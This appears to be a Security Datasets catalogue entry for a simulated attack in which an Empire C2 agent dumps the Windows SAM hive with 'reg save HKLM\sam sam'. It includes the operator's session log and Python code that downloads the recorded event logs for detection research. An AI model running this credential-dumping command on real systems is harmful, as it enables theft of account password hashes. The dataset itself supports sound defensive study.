Empire Reg Dump SAM Hive

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/06/25

Modification Date

2019/06/25

Tactics

TA0006

Techniques

T1003.002

Tags

SAM Rquest Handle

Dataset Description

This dataset represents adversaries with administrator privileges using the windows reg utility to dump the SAM registry hive.

Simulation Metadata

Tools

type

Name

Module

Interactive Session

Remote Desktop Protocol

None

Adversary View

(Empire: WE8XYD3K) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 08:27:49  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > shell reg save HKLM\sam sam
[*] Tasked WE8XYD3K to run TASK_SHELL
[*] Agent WE8XYD3K tasked with task ID 5
(Empire: WE8XYD3K) > 
The operation completed successfully.

..Command execution completed.

(Empire: WE8XYD3K) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_reg_dump_sam.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)